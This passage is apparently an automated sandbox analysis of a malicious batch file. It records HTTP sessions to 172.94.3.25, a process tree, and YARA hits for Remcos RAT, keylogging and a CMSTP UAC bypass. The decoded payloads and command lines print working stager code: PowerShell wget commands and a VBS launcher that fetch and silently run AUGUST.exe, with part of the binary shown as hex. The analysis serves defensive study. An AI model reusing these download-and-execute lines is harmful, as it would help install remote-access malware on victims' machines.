                        Sep 25, 2024 16:04:02.458213091 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.485136032 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.485172033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.485184908 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.485205889 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.524223089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.524266005 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.524281025 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.524291039 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.524296999 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.524307966 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.524346113 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.533085108 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.533091068 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.533149004 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.534456968 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.534486055 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.534497976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.534538984 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.534944057 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.534975052 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.534986019 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535022020 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.535444975 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535450935 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535465002 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535496950 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.535541058 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535547018 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535557032 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535562992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.535589933 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.543622971 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.543627977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.543680906 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.573558092 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:04:02.573642969 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:04:02.680372953 CEST4971580192.168.2.6172.94.3.25
                        • 172.94.3.25
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649711172.94.3.25804304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 25, 2024 16:03:14.889024973 CEST163OUTGET /ffo.bat HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 172.94.3.25
                        Connection: Keep-Alive
                        Sep 25, 2024 16:03:16.695877075 CEST396INHTTP/1.1 200 OK
                        Content-Length: 116
                        Last-Modified: Wed, 25 Sep 2024 10:10:11 GMT
                        Content-Type: text/plain
                        Date: Wed, 25 Sep 2024 14:03:16 GMT
                        ETag: "df2e60705fdf43715c85c86652fee62b-1727259011-116"
                        Accept-Ranges: bytes
                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                        Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 41 55 47 55 53 54 2e 65 78 65 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54 2e 65 78 65 0d 0a 73 74 61 72 74 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54 2e 65 78 65 0d 0a
                        Data Ascii: @echo offpowershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exestart %APPDATA%/AUGUST.exe


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.649714172.94.3.25803968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 25, 2024 16:03:17.759859085 CEST162OUTGET /hi.vbs HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 172.94.3.25
                        Connection: Keep-Alive
                        Sep 25, 2024 16:03:19.699534893 CEST420INHTTP/1.1 200 OK
                        Content-Length: 126
                        Last-Modified: Wed, 25 Sep 2024 10:18:03 GMT
                        Content-Type: application/octet-stream
                        Date: Wed, 25 Sep 2024 14:03:19 GMT
                        ETag: "5374c228c78d8b24803c35ae359f5b7e-1727259483-126"
                        Accept-Ranges: bytes
                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                        Data Raw: 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 20 0d 0a 57 73 68 53 68 65 6c 6c 2e 52 75 6e 20 63 68 72 28 33 34 29 20 26 20 22 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 22 20 26 20 43 68 72 28 33 34 29 2c 20 30 0d 0a 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 4e 6f 74 68 69 6e 67
                        Data Ascii: Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0Set WshShell = Nothing


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.649715172.94.3.25805936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 25, 2024 16:03:21.855631113 CEST166OUTGET /AUGUST.exe HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 172.94.3.25
                        Connection: Keep-Alive
                        Sep 25, 2024 16:03:22.714893103 CEST1236INHTTP/1.1 200 OK
                        Content-Length: 4809996
                        Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT
                        Content-Type: application/x-msdownload
                        Date: Wed, 25 Sep 2024 14:03:22 GMT
                        ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"
                        Accept-Ranges: bytes
                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P0.text `.rdata002@@.data,)pH@.rsrcP@@USVWj'uv=`2A6PPe~v8^3h3APPPp1AEE;FrP,fY-jt1At$l39wAt@9D$tt$Ph5wA2A3D$`|$u@3D$VtPQ^T$Vt$fBBFFfu^L$3f9t@f<AuS\$VC;^tLW3jZQ39FY~9F~fAfG@;F|6YF>f$G^_^[UQQlwAuVjjEP5wA
                        Sep 25, 2024 16:03:22.714921951 CEST466INData Raw: ff 15 6c 31 41 00 85 c0 74 3e 8b 45 fc 3b 45 10 77 36 72 08 8b 45 f8 3b 45 0c 73 2c 6a 2a e8 d4 0d 00 00 50 e8 48 65 00 00 83 f8 01 59 59 74 11 c7 05 28 77 41 00 6a 00 00 00 b8 05 40 00 80 eb 20 83 0d 6c 77 41 00 01 8d 45 0c 50 6a 00 68 01 80 00
                        Data Ascii: l1At>E;Ew6rE;Es,j*PHeYYt(wAj@ lwAEPjh5wA2A3D$t(wA@:Vt$W~ ?tNF0PKu~tv<v$h1A_3^UVud1A}juuv$j}iuv$jjduVP^]
                        Sep 25, 2024 16:03:22.714935064 CEST1236INData Raw: ff 77 04 e8 ab fd ff ff ff 37 ff 36 e8 72 fd ff ff 8b 47 04 59 59 89 46 04 5f 8b c6 5e c2 04 00 53 8b 5c 24 08 56 57 8b 79 08 8b f7 2b 71 04 4e 3b de 7e 30 83 ff 40 7e 09 8b c7 99 2b c2 d1 f8 eb 0f 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d
                        Data Ascii: w76rGYYF_^S\$VWy+qN;~0@~+3H0;}+WO_^[VW|$wF7APGFYY_^V3jFF^VjeFfT$fAFFf$A^UuMuMu
                        Sep 25, 2024 16:03:22.714946985 CEST1236INData Raw: 89 78 10 89 78 14 e8 fc c2 00 00 84 c0 0f 85 b0 00 00 00 ff 15 50 31 41 00 53 8d 4d e4 89 45 08 e8 86 fa ff ff 8d 45 e4 50 e8 e0 14 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 6a 03 01 00 8b 45 0c 3b c7 59 74 06 8b 08
                        Data Ascii: xxP1ASMEEP;Y};ujjVP ujE;YtPQMuLYMf<AuEYujhVPFjSHxxbuP1APjjVS uYuMVnEM0#E8>P1APji
                        Sep 25, 2024 16:03:22.714963913 CEST328INData Raw: 45 d4 50 6a 18 ff 75 08 ff 15 20 30 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 1c 30 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 18 30 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 14 30
                        Data Ascii: EPju 0AWSuWSuEu50AEuu50ASuEuu0APWjWE0Ah u3uPPSuuPPW0AjW0AuESuW500ASWujD2AEuWD2AWWWWu2A_^[UhSVWj@EPu2A-
                        Sep 25, 2024 16:03:22.714975119 CEST1236INData Raw: 7d f8 10 0f 82 cf 00 00 00 ff 75 f8 6a 40 ff 15 70 30 41 00 ff 75 f8 8b f8 53 57 e8 8e fd 00 00 83 c4 0c 56 ff 15 00 33 41 00 8d 45 f4 50 56 57 ff 15 04 33 41 00 85 c0 0f 85 93 00 00 00 39 75 f4 0f 84 8a 00 00 00 8d 45 f0 50 68 14 4c 41 00 56 56
                        Data Ascii: }uj@p0AuSWV3AEPVW3A9uEPhLAVVu2AEPQWl0AE;tfURuPQ9ut?uYMQjPE 0AjuuVVVu2AuVhru2AEPQ3@Wl0A3_^[f=,wAuD0Af,w
                        Sep 25, 2024 16:03:22.714987993 CEST224INData Raw: 70 ff ff ff 5f 5e 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 d8 31 41 00 83 c4 0c c2 08 00 8b 54 24 04 56 8b 74 24 0c 8b c2 8a 0e 88 0a 42 46 84 c9 75 f6 5e c3 56 eb 0d 8b 08 8b 32 80 3c
                        Data Ascii: p_^[QL$+THRQL$HP1AT$Vt$BFu^V2<1tA;J|2^PpA^$u;ut;B|2S\$VWu33|$Gt$P0AtF;w|3_^[t
                        Sep 25, 2024 16:03:22.714999914 CEST1236INData Raw: 33 8b 47 0c 8b 04 b0 eb ee 56 8b f1 ff 76 0c e8 ce f7 00 00 ff 36 e8 c7 f7 00 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 91 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83 ec 40 83 7d 08 00 75 04 33 c0 c9 c3 f6 05 6c 77
                        Data Ascii: 3GVv6YY^t$t$t$t@3U@}u3lwAE@uEEP0At7M3;w.rE;Es$j+PoRYYtlwAlwA3@t$Yujht$j0At$jYu%1AV3Wt$FF
                        Sep 25, 2024 16:03:22.715173960 CEST1236INData Raw: 87 00 00 00 8b 45 f8 8a 00 3a c3 88 45 e0 74 7f ff 75 e0 8b 4d 14 e8 35 fd ff ff 47 ff 45 f8 eb bc 2b 45 f4 3b f8 77 23 ff 75 f4 ff 75 0c ff 75 f8 e8 ea f2 00 00 83 c4 0c 85 c0 75 de 8b 45 f4 03 f8 01 45 f8 c6 45 ff 01 eb 92 2b f7 01 7d ec 56 8d
                        Data Ascii: E:EtuM5GE+E;w#uuuuEEE+}V=]PP1A9]w}"M39Y2_^[UQM&=t uMMtEU=wAujzVWM
                        Sep 25, 2024 16:03:22.715188026 CEST1236INData Raw: ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 e0 32 41 00 85 c0 74 49 68 d0 33 41 00 8d 45 8c 50 ff 15 74 30 41 00 85 c0 75 36 6a f0 56 ff 15 e4 32 41 00 a8 0e 75 29 8d 45 e8 56 50 e8 76 ff ff ff 6a 05 68 80 34 41 00 ff 75 e8 e8 6f ec ff ff
                        Data Ascii: tSVuWj@EPV2AtIh3AEPt0Au6jV2Au)EVPvjh4AuotuY3_^[Vd2A3;Etht4AT0AEPVQYYV2Ah0AE+ESSWuPE+EPuuhPh\3Ah\4AST2A;{V<2A52ASj"hY
                        Sep 25, 2024 16:03:22.719903946 CEST1236INData Raw: 10 00 74 3f 6a 00 ff 75 a4 ff 75 0c e8 34 f1 ff ff 8b f8 83 c4 0c 85 ff 74 29 68 a0 34 41 00 ff 75 a4 ff d6 85 c0 74 1b 68 8c 34 41 00 ff 75 a4 ff d6 85 c0 74 0d ff 75 b0 8d 4f 0c e8 50 e0 ff ff eb 0c 8b 4d 0c 8d 45 a4 50 e8 85 fc ff ff 8d 4d a4
                        Data Ascii: t?juu4t)h4Auth4AutuOPMEPM6uAuuSMu&uuMEP0MuY_^[USVW}W0AWME39uVMD_f


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:10:03:07
                        Start date:25/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
                        Imagebase:0x7ff73b340000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:10:03:07
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:10:03:07
                        Start date:25/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:10:03:15
                        Start date:25/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:10:03:18
                        Start date:25/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                        Imagebase:0x7ff73b340000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:10:03:18
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:10:03:18
                        Start date:25/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                        Imagebase:0x7ff601170000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:10:03:19
                        Start date:25/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                        Imagebase:0x7ff73b340000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:10:03:19
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:10:03:19
                        Start date:25/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:10:04:01
                        Start date:25/09/2024
                        Path:C:\Users\user\AppData\Roaming\AUGUST.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming/AUGUST.exe
                        Imagebase:0x400000
                        File size:4'809'996 bytes
                        MD5 hash:25860926414BF43383246F7C773A8D6C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000003.2720616296.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Target ID:15
                        Start time:10:04:02
                        Start date:25/09/2024
                        Path:C:\Users\user\DZIPR.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\DZIPR.exe"
                        Imagebase:0x400000
                        File size:8'767'704 bytes
                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:16
                        Start time:10:04:04
                        Start date:25/09/2024
                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                        Imagebase:0x400000
                        File size:8'767'704 bytes
                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:17
                        Start time:10:04:04
                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmd.exe
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Has exited:true

                        Target ID:18
                        Start time:10:04:05
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:10:04:14
                        Start date:25/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:20
                        Start time:10:04:21
                        Start date:25/09/2024
                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                        Imagebase:0x400000
                        File size:8'767'704 bytes
                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:10:04:22
                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmd.exe
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Target ID:22
                        Start time:10:04:22
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:10:04:27
                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\explorer.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\explorer.exe
                        Imagebase:0x400000
                        File size:4'514'184 bytes
                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                        Has exited:true

                        Target ID:24
                        Start time:10:04:29
                        Start date:25/09/2024
                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                        Imagebase:0x400000
                        File size:8'767'704 bytes
                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:10:04:29
